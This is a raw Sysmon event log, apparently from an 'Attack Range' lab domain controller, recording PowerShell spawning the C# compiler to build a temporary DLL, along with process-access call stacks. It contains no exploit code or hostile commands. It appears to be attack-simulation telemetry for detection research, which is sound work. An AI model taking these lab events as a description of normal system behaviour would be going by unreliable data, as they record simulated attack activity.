(rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\WinNetMon.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{D28789B6-7CDA-5FA1-0E01-000000008801}1592C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 11241100x80000000000000006062Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:53:06.226{D28789B6-7CE2-5FA1-4801-000000008801}3160C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeC:\Users\Administrator\AppData\Local\Temp\qivzjcw2\qivzjcw2.dll2020-11-03 15:53:06.148 10341000x80000000000000006061Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.210{D28789B6-7CE0-5FA1-3001-000000008801}47404528C:\Windows\system32\conhost.exe{D28789B6-7CE2-5FA1-4901-000000008801}2012C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006060Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.210{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006059Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.210{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006058Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.210{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006057Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.210{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006056Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.210{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006055Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.210{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006054Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.210{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006053Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.210{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006052Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.210{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006051Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.210{D28789B6-7C62-5FA1-0500-000000008801}644804C:\Windows\system32\csrss.exe{D28789B6-7CE2-5FA1-4901-000000008801}2012C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006050Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.210{D28789B6-7CE2-5FA1-4801-000000008801}31602600C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe{D28789B6-7CE2-5FA1-4901-000000008801}2012C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+b181|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3d58|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3ed0|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3fa6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+274e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+27a0|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+28e4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+7e38f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+45d22|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+448ef|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+445e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+44303|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+18321|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+17b76|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+9e0d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+1edf02|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000006049Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.220{D28789B6-7CE2-5FA1-4901-000000008801}2012C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe12.00.52519.0 built by: VSWINSERVICINGMicrosoft® Resource File To COFF Object Conversion UtilityMicrosoft® .NET FrameworkMicrosoft CorporationCVTRES.EXEC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\ADMINI~1\AppData\Local\Temp\RES6DC.tmp" "c:\Users\Administrator\AppData\Local\Temp\qivzjcw2\CSC16FC4CB7E162484587829578FF76DCC1.TMP"C:\Users\Administrator\ATTACKRANGE\Administrator{D28789B6-7CE0-5FA1-AF9E-0B0000000000}0xb9eaf0HighMD5=33BB8BE0B4F547324D93D5D2725CAC3D,SHA256=54315FD2B69C678EB7D8C145F683C15F41FA9F7B9ABF7BF978667DF4158F43C3,IMPHASH=9A65E39CA38ADDAA7D4BB704AD0223FF{D28789B6-7CE2-5FA1-4801-000000008801}3160C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Administrator\AppData\Local\Temp\qivzjcw2\qivzjcw2.cmdline" 10341000x80000000000000006048Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.148{D28789B6-7CE0-5FA1-3001-000000008801}47404528C:\Windows\system32\conhost.exe{D28789B6-7CE2-5FA1-4801-000000008801}3160C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006047Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.148{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006046Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.148{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006045Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.148{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006044Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.148{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006043Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.148{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006042Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.148{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006041Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.148{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006040Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.148{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006039Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.148{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006038Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.148{D28789B6-7C62-5FA1-0500-000000008801}644804C:\Windows\system32\csrss.exe{D28789B6-7CE2-5FA1-4801-000000008801}3160C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006037Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.148{D28789B6-7CE1-5FA1-4001-000000008801}48042868C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{D28789B6-7CE2-5FA1-4801-000000008801}3160C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+270222|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26fe9f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26f9ee|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26f97a|C:\Windows\assembly\NativeImages_v4.0.